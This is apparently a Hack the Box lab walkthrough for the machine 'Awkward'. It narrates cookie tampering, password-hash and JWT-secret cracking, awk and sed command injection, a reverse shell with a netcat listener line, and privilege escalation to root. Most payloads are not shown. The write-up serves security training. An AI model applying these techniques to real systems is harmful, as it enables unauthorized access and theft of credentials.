Hack the Box: AWKWARD

Machine difficulty: Medium

Setting up the environment

Refer the blog on the machine MEOW to configure and connect to the HTB VPN.

Cracking AWKWARD

STEP 1: Launch the machine

In order to use the machine, we must first launch an instance of it. However, connecting to the VPN is necessary before the machine can be spawned. If you're unsure where to begin, take a look at my Meow walkthrough where I already discussed on the topic. You will be granted an IP address once you have joined and created a machine.

STEP 2: Check its status

We can use the ping tool to test if the machine responds to our ICMP messages in order to verify that we can interact with it. You may do this from the terminal by entering ping followed by the device's IP address.

STEP 3: Enumeration

Using nmap we enumerate that ports 80 and 22 are open and he port. On trying the default passwords for port 22(ssh) there were no successful results. On opening port 80 on the browser the name allotted for the port is http://hat-valley.htb. Once viewed add it to the /etc/hosts to access the functionality. This can be done by the command: sudo vim/etc/hosts and the enter the ip along with the domain name and save the file.

Access the website by entering the address and you will be redirected to the following page as shown below:

The websiteseems to have no input fields. Lets now enumerate the directories using dirsearch and see what we can find.

We discovered a few intriguing directories that might disclose sensitive data. The other way to go about this is you could check the source code of the app and if it seems too messy beautifier.io could be used to make it easier to read. One of them were the app.js. Let's examine the /js directory in more detail and list them all.

Using FFUF we try to fuzz the sub domains present within the domain.

We observe the store domain present with a successful status request.

store.hat-valley.htb is to be added to your /etc/hosts/ file. Attempting to navigate to the page, it appears we will need credentials first:

After learning about directories and subdomains, let's take a closer look at what goes on behind the scenes when we use the website. Launch the proxy browser in Burp Suite and go to hat-valley.htb. When we initially visit the page, we can observe something intriguing right away by looking at the request that is being submitted to the server:

What would happen if we set the guest value to admin? Using Burp Suite's Match and Replace tool, or just by editing the value and resending the request you may automatically alter the cookie token's value.

We can attempt to browse the hat-valley.htb/staff-details page with our new cookie. The below image shows the staff-details page before the cookie is edited.

On changing the cookie from gues to admin we obtain the following by viewing its JSON file:

It appears that we have the complete names, emails, and phone numbers of Hat Valley employees in addition to their usernames and password hashes. An attacker should never have access to this information. Observe that the system administrator is identified as "Bean Hill."

We need to identify the kind of hashing algorithm they are utilizing before we can attempt to decipher these hashes. We find out that the passwords are hashed using SHA256 with the aid of either a tool called crackmap, hashcat or an online de-hasher (which I used).

As seen above we obtain the password for user: Christopher jones. Lets enter the credentials on the store page.

And boom!! We’re in as Christopher.

STEP 4: Gaining Foothold

Looking around, we can see that the dashboard page has a form field for requesting time off, staff information, website stats, and an online store status refresh button. Now that a session token has been created, we should obtain a session cookie that can be seen with burpsuite:

For making the request readable let us send it to the decoder.

The query, as we observe, indicates store.hat-valley.htb, which is the same subdomain that we discovered previously during our enumeration. This subdomain seems like it will be significant .

Let us try to further discover if this particular subdomain is using any services or ports:

Three ports are open where burpsuite is using 8080, http is using 80. So let us see what 3002 is being used by. Navigate to the url by using the below link.

This box must have gotten its name from the susceptible awk command that is executed when querying /api/all-leave, according to the description for that resource: 

The awk command passes the user variable. We can take advantage of this by manipulating the user variable to include what we want, such as local files. Therefore, if we change the user variable to /etc/passwd, we should gain access to that folder. The value of the user variable is the JWT token username. In order for this to work, we will need to know the JWT token secret, which is found in the cookie. Let’s once again log into hat-valley.htb/dashboard in Burp Suite and intercept traffic:

The user variable is being permitted by the awk command. This can be taken advantage of by manipulating the variable by injecting what we want in the form of files. As we are trying to gain access we can change the variable to /etc/passwd. The JWT token username is the assigned value of he variable. To perform this the secret of the JWT token is to be known which is present in the cookie. Let's attempt to intercept traffic by logging into hat-valley.htb/dashboard in Burp Suite once more:

The JWT token could be cracked using jwt2john.py and John. The demonstration is as given below:

Now that we’ve cracked the secret we can customize our cookie to include the etc/passwd file by using the website jwt.io.

The created cookie is as shown below:

We can now send a modified cookie value by using the curl command. Curl is used to send a request or a parameter of the request to the server side.

As seen above there exists a tar.gz file which consistes of various files. Lets unzip it using the curl command. The syntax is as given below

On unzipping we find /config/xpad/.

In the highlighted file above we find something very interesting:

This seems like a username and a password. In the very beginning in an nmap scan we found that port 22 was running an ssh service. Let us try authenticating ourselves on with the above obtained credentials.

And bingo!! We’re in. Type in ls and one of the files listed is named user.txt. That is our first flag i.e our user flag.

STEP 5: Privilege escalation

Before getting started let us recon some more about the store by looking up the technologies it is using. I have used wapplyzer but feel free to use any if known.

From the above image we know that the authorization requests are being received by an nginx server. Lets see if we can find anything important about nginx.

Oof! We find oth the username: admin and a hashed password. Now before trying to use these credentials its noticeable that the password is hashed. I went ahead with bean’s password found earlier and  by the grace of the cyber gods it was it! But the password is an MD5 hashed value that could be de-hashed with some password cracking tools.

As you might expect, this is Hat Valley's internet shop. We can find the site's source files within our shell by going to /var/www/store. Looking at README.md, we discover that files are kept offline under /product-details and /cart. Furthermore, we discover that the header for products is used to verify products.

In the following directory list all the items. One of them present is the cart_actions.php. Use cat cart_actions.php to read the contents of the file.

The sed command is being used to remove data from the cart file. Perhaps we can exploit this to enable remote code execution. To see how this works, add one item to the cart:

The cart has been updated with a value which is probably that of the item added.

Let us create a reverse shell and add it to our /tmp folder along with some parameters that give us privileges.

To create a file type mentioned above we need privileges which we currently do not own. Therefore we create a temporary file mimicking the cart item and give it the parameters required and we replace the cart item.

Turn on the netcat listener and edit the item id on burpsuite:

Replace the below:

to:

If the above is performed successfully the we should be getting a shell:

You ought to be logging in to the server using the username www-data. Digging about, we come upon a fascinating file called leave_requests.csv located in the /var/www/private directory.

We can take advantage of this by modifying our shell file and incorporating a line that runs it to leave_requests.csv.

Using our shell file, we can add the following line that executes it to the mail file:

Type in sudo netcat -lvnp 9001.

Navigate to the root folder:

And finally we have pwned awkward with the final root flag!!